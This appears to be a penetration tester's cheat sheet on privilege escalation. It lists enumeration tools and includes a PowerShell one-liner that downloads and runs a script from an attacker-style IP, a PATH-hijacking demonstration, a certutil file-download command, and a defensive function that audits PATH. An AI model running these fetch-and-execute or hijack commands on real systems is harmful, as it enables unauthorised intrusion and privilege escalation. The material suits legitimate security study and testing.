Just because you popped a shell doesn't mean it's game over. Sometimes you find yourself in a low-privilege process, and to fully compromise the host you need to escalate your privileges.
| Checklists |
|---|
| g0tmi1k Linux Privilege Escalation |
| hacktricks Linux Privilege Escalation |
| fuzzysecurity Windows Privilege Escalation |
| PowerSploit - PowerUp |
| PayloadAllTheThings |
| Scripts | Usage |
|---|---|
| linPEAS | |
| winPEAS | |
| linenum | |
| MSF - local_exploit_suggester | |
| AonCyberLabs/Windows-Exploit-Suggester | |
| jondonas/linux-exploit-suggester-2 | |
| RastaMouse/Sherlock | `powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.24:8888/Sherlock.ps1');$a=find-allvulns;$a | where-object {$_.VulnStatus -notlike 'not *'}| ft Title,VulnStatus,MSBulletin,CVEID,Link -autosize"` |
If a program looks up a command by name through `PATH` and we can write to a directory that is searched first (or prepend one), we can trick the system into executing something else. After the commands below, whenever `ls` is invoked in this shell it will actually run `cat`. Note that `export PATH` only changes the environment of the current shell and its children; against another process (a cron job, a SUID binary calling `system()`) the hijack only works if that process's own `PATH` includes the writable directory.

```bash
# Create the writable directory and put it in front of every real bin directory
mkdir -p /tmp/tmp
export PATH="/tmp/tmp:${PATH}"
# Drop a copy of cat into it under the name ls
cp /bin/cat /tmp/tmp/cat
mv /tmp/tmp/cat /tmp/tmp/ls
```
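The flip side of the trick above is checking whether a given account's `PATH` is hijackable at all. The following is an added example, not part of the original notes: a POSIX `sh` function (the name `path_risks` is my own) that walks a `PATH` string and flags the entries an attacker could abuse: empty or `.` entries (current directory), relative entries, directories writable by the caller, and directories that do not exist yet (which someone may be able to create). Run it as the low-privilege account you are worried about; as root every directory is writable, so the result is meaningless.

```shell
#!/bin/sh
# Added example (not from the original notes): audit a PATH string for
# entries that would let command lookup be hijacked.
# Prints one "kind:entry" line per finding and returns 1 if anything was
# flagged, 0 if the PATH looks clean. Function name is hypothetical.
path_risks() {
    rest="$1:"      # trailing colon as sentinel so the last entry is processed
    found=0
    while [ -n "$rest" ]; do
        d="${rest%%:*}"         # entry before the first colon
        rest="${rest#*:}"       # drop it (and the colon) from the remainder
        case "$d" in
            ""|.)
                # empty entry or "." makes the shell search the current directory
                echo "cwd:$d"; found=1 ;;
            /*)
                if [ ! -d "$d" ]; then
                    # absent directory: hijackable if it can be created later
                    echo "missing:$d"; found=1
                elif [ -w "$d" ]; then
                    # caller can drop a binary here that shadows real commands
                    echo "writable:$d"; found=1
                fi ;;
            *)
                # relative entry resolves differently in every working directory
                echo "relative:$d"; found=1 ;;
        esac
    done
    [ "$found" -eq 0 ]
}

# Stand-alone usage: audit the PATH of the account running this script.
path_risks "$PATH"
```

The check deliberately treats a missing absolute directory as a finding rather than ignoring it; a `PATH` that still lists a removed `/opt/tool/bin` is exactly the case where an unprivileged user creating that directory gets command execution in somebody else's context.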
Windows: download a file with the built-in `certutil.exe` (a well-known LOLBin, so expect it to be logged or flagged by EDR):

```bat
certutil.exe -urlcache -split -f "https://url/file" file
```